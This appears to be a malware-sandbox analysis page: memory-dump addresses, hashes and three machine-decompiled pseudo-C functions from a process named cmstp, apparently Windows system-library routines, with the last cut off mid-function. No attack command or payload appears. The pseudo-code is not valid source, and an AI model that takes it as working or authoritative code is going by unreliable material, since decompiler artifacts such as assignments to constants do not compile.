0x050e8551
0x050e876e
0x050e8778
0x050e877b
0x050e8780
0x050e8557
0x050e8557
0x050e855d
0x050e855d
0x050e856b
0x050e856e
0x050e8570
0x050e8573
0x050e8576
0x050e8576
0x050e8579
0x050e857b
0x00000000
0x00000000
0x050e8581
0x050e85a0
0x050e85a2
0x050e85a5
0x050e85a7
0x05139b1b
0x05139b1b
0x050e862e
0x050e862e
0x050e8631
0x050e8631
0x050e8634
0x050e8636
0x050e8669
0x050e8669
0x050e866b
0x05139bbf
0x05139bc4
0x05139bc8
0x05139bce
0x05139bce
0x050e8671
0x050e8671
0x050e8674
0x050e8676
0x05139bae
0x05139bae
0x050e8676
0x050e867c
0x050e867e
0x050e8688
0x050e8688
0x00000000
0x050e867e
0x050e8638
0x050e8638
0x050e863b
0x050e863e
0x050e863f
0x050e8642
0x050e8645
0x050e8648
0x050e864d
0x05139b69
0x05139b6e
0x05139b7b
0x05139b81
0x05139b85
0x05139b89
0x05139ba7
0x05139b8b
0x05139b91
0x05139b9a
0x05139b9f
0x05139b9f
0x050e8788
0x050e878d
0x050e8763
0x050e8763
0x050e8766
0x00000000
0x050e8766
0x05139b70
0x00000000
0x05139b70
0x050e8656
0x050e865a
0x050e865c
0x050e8752
0x050e8756
0x00000000
0x00000000
0x050e875e
0x00000000
0x050e875e
0x050e8662
0x050e8662
0x050e8662
0x050e8666
0x00000000
0x050e8666
0x050e85b7
0x050e85b9
0x050e85bc
0x050e85bf
0x050e85cc
0x050e85d1
0x050e85d4
0x050e85db
0x050e85de
0x050e85e0
0x05139b5f
0x00000000
0x05139b5f
0x050e85e6
0x050e85ea
0x050e86c3
0x050e86c5
0x050e86c8
0x050e86ca
0x05139b16
0x00000000
0x05139b16
0x050e86d6
0x050e85f6
0x050e85f6
0x050e85f9
0x050e8602
0x050e8606
0x050e860a
0x050e860b
0x050e860e
0x050e8611
0x00000000
0x050e8611
0x050e85f3
0x00000000
0x050e85f3
0x050e8619
0x050e861e
0x050e861e
0x050e8621
0x050e8622
0x050e8623
0x050e8625
0x050e862c
0x00000000
0x050e873d
0x00000000
0x050e873d
0x050e8737
0x050e850f
0x050e8512
0x00000000
0x050e8512
0x00000000
0x050e84d6

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d0ecfe85979b8da4d9686e764628c6bf3ca9abf122b48711d6f07277547f88d
Instruction ID: 22097209d7913c11c599a0a4a4e576f32be411ab471475dbd26de05c62f3734b
Opcode Fuzzy Hash: 7d0ecfe85979b8da4d9686e764628c6bf3ca9abf122b48711d6f07277547f88d
Instruction Fuzzy Hash: E7B16DB0F04209DFDB15DF98D994EADBBB6FF45304F20812AE505AB285DB71A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0510513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0510513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x51cd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0511D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E050F2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L050F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0511F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E050EFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x51cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0511B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x05105142
0x0510514c
0x05105150
0x05105157
0x05105159
0x0510515e
0x05105165
0x05105169
0x0510516c
0x05105172
0x05105176
0x0510517a
0x0510517a
0x0510517a
0x0510517f
0x05146d8b
0x05146d8e
0x05146d91
0x05146d95
0x05146d98
0x05146d9c
0x05146da0
0x05146da3
0x05146da7
0x05146e26
0x05146e26
0x05146e2a
0x051051f9
0x051051f9
0x051051fe
0x05146e33
0x05146e33
0x05146e39
0x05146e3d
0x05146e46
0x05146e50
0x00000000
0x00000000
0x05146e52
0x05146e53
0x05146e56
0x05146e5d
0x00000000
0x00000000
0x00000000
0x05146e5f
0x05146e67
0x05146e77
0x05146e7f
0x05146e80
0x05146e88
0x05146e90
0x05146e9f
0x05146ea5
0x05146ea9
0x05146eb1
0x05146ebf
0x00000000
0x00000000
0x05146ecf
0x05146ed3
0x00000000
0x00000000
0x05146edb
0x05146ede
0x05146ee1
0x05146ee8
0x05146eeb
0x05146eed
0x05146ef0
0x05146ef4
0x05146ef8
0x05146efc
0x00000000
0x00000000
0x05146f0d
0x05146f11
0x05146f32
0x05146f37
0x05146f3b
0x05146f3e
0x05146f41
0x05146f46
0x00000000
0x00000000
0x05146f4c
0x05146f50
0x05146f50
0x05146f54
0x05146f62
0x05146f65
0x05146f6d
0x05146f7b
0x05146f7b
0x05146f93
0x05146f98
0x05146fa0
0x05146fa6
0x05146fb3
0x05146fb6
0x05146fbf
0x05146fc1
0x05146fd5
0x05146fda
0x05146fda
0x05146fdd
0x05146fe2
0x05146fe7
0x05146feb
0x05146fef
0x05146ff3
0x0510520c
0x0510520c
0x0510520f
0x05105215
0x05105234
0x0510523a
0x0510523a
0x05105244
0x05105245
0x05105246
0x05105251
0x05105251
0x05146f13
0x05146f17
0x05146f17
0x05146f18
0x05146f1b
0x05146f1f
0x05146f23
0x00000000
0x05146f28
0x05105204
0x05105204
0x05105208
0x00000000
0x05105208
0x05105185
0x05105188
0x0510518a
0x0510518e
0x05105195
0x05146db1
0x05146db5
0x05146db9
0x0510519b
0x0510519b
0x0510519e
0x051051a7
0x051051a9
0x051051a9
0x051051b5
0x051051b8
0x051051bb
0x051051be
0x051051c1
0x051051c5
0x051051c9
0x051051cd
0x051051cd
0x051051d8
0x051051dc
0x051051e0
0x05146dcc
0x05146dd0
0x05146dd5
0x05146ddd
0x05146de1
0x05146de1
0x05146de5
0x05146deb
0x05146df1
0x05146df7
0x05146dfd
0x05146e01
0x05146e05
0x05146e09
0x05146e0d
0x05146e11
0x05146e11
0x051051eb
0x05146e1a
0x05146e1f
0x05146e21
0x05146e23
0x00000000
0x051051f1
0x051051f1
0x00000000
0x051051f1

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfccbe249fa64c2df153451344bf915284d3b9e0588c3d200948d911af2327ee
Instruction ID: f35bbf611accf364991ad28047335bd0dad7e9ff1abaadb76fec0f8dcbddddb6
Opcode Fuzzy Hash: dfccbe249fa64c2df153451344bf915284d3b9e0588c3d200948d911af2327ee
Instruction Fuzzy Hash: 69C124755083808FD354CF28C480A5AFBE2BF89308F14996EF8998B392D775E845CF42

Uniqueness

Uniqueness Score: -1.00%

Function 051003E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E051003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x51cd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E05100548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0511B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E050EB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x51c7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E050F7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E050F7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05157016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E05119830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E051569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x51c7c04 != 0) {
						_t118 = _v12;
						_t120 = E0515A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x51c7bd8;
						if( *0x51c7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E051195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E051199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05153540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E050DB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0511AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x51c8474 - 3;
										if( *0x51c8474 != 3) {
											 *0x51c79dc =  *0x51c79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E050F7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E050F7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05157016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x51c8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x51c7b00; // 0x0
							asm("ror esi, cl");
							 *0x51cb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E051195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E050E7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x051003f1
0x051003f7
0x051003f9
0x051003fb
0x051003fd
0x05100400
0x0510040a
0x05144c7a
0x05100537
0x05100547
0x05100410
0x05100410
0x05100414
0x05100417
0x0510041a
0x05100421
0x05100424
0x0510042b
0x0510043b
0x0510043e
0x0510043f
0x0510043f
0x05100446
0x05100449
0x0510044c
0x0510044f
0x05100459
0x05144c8d
0x0510045f
0x0510045f
0x0510045f
0x05100467
0x05144c97
0x05144c9d
0x05144ca4
0x05144caa
0x05144caf
0x05144cb1
0x05144cc3
0x05144cb3
0x05144cbc
0x05144cbc
0x05144cc8
0x05144ccb
0x05144cd7
0x05144cda
0x05144cdf
0x05144cdf
0x05144ccb
0x05144ca4
0x0510046d
0x0510046f
0x0510046f
0x05100471
0x05100476
0x0510047a
0x0510047b
0x05100483
0x05100489
0x0510048d
0x00000000
0x00000000
0x05144ce9
0x05144cef
0x05144d22
0x05144d22
0x00000000
0x05144d22
0x05144cf1
0x05144cf7
0x00000000
0x00000000
0x05144cf9
0x05144cff
0x00000000
0x00000000
0x05144d05
0x05144d07
0x00000000
0x00000000
0x05144d0d
0x05144d0f
0x05144d14
0x05144d16
0x00000000
0x00000000
0x05144d1c
0x05144d1c
0x05100499
0x05100535
0x05100535
0x00000000
0x05100535
0x051004a6
0x05144d2c
0x05144d37
0x05144d39
0x05144d3b
0x00000000
0x00000000
0x05144d41
0x05144d48
0x05100527
0x0510052b
0x0510052d
0x05100530
0x05100530
0x00000000
0x0510052b
0x05144d4e
0x051004ac
0x051004ac
0x051004af
0x051004b2
0x051004b7
0x051004b9
0x051004bb
0x051004bd
0x051004bf
0x051004c5
0x051004c9
0x05144d53
0x05144d59
0x05144db9
0x05144dba
0x05144dbf
0x05144dc2
0x05144dc4
0x05144dc7
0x05144dce
0x00000000
0x05144dce
0x05144d5b
0x05144d61
0x00000000
0x00000000
0x05144d63
0x05144d69
0x00000000
0x00000000
0x05144d6b
0x05144d6e
0x05144d74
0x05144d76
0x05144d7c
0x05144d7e
0x05144d84
0x05144d89
0x05144d8c
0x05144d8d
0x05144d92
0x05144d95
0x05144d96
0x05144d98
0x05144d9a
0x05144d9f
0x05144da4
0x05144da6
0x05144da8
0x05144daf
0x05144db1
0x05144db1
0x05144daf
0x05144da6
0x05144d84
0x05144d7c
0x00000000
0x05144d74
0x051004d6
0x05144de1
0x051004dc
0x051004dc
0x051004dc
0x051004e4
0x05144deb
0x05144df1
0x05144df8
0x05144dfe
0x05144e03
0x05144e05
0x05144e17
0x05144e07
0x05144e10
0x05144e10
0x05144e1c
0x05144e1f
0x05144e35
0x05144e35
0x05144e1f
0x05144df8
0x051004f1
0x051004fa
0x05144e3f
0x05144e47
0x05144e5b
0x05144e61
0x05144e67
0x05144e69
0x05144e71
0x05144e73
0x05100500
0x05100500
0x05100500
0x051004fa
0x05100508
0x0510051d
0x0510051d
0x0510051f
0x05100524
0x00000000
0x05100524
0x05100515
0x05100517
0x05144e7a
0x05144e7c
0x00000000
0x00000000
0x05144e85
0x00000000
0x05144e85
0x00000000
0x05100517

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88107b68d006c7bb05dcf883d9afae42f8a066c9a4c0b9721dfc64ac01218411
Instruction ID: 3ff15e173907b46686ee267eed58c3f6d95d301004a493d79326406bc7074715
Opcode Fuzzy Hash: 88107b68d006c7bb05dcf883d9afae42f8a066c9a4c0b9721dfc64ac01218411
Instruction Fuzzy Hash: 80912131F04654ABEF31DA68C84CBBD7BA5BB09720F061261E921AB2D1DBB49D40CB85

Uniqueness

Uniqueness Score: -1.00%

Function 050DC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E050DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x51cd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E050E6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0511B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x51c7b9c; // 0x0
					_t74 = L050F4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E05119650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L050F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0511F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E051113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
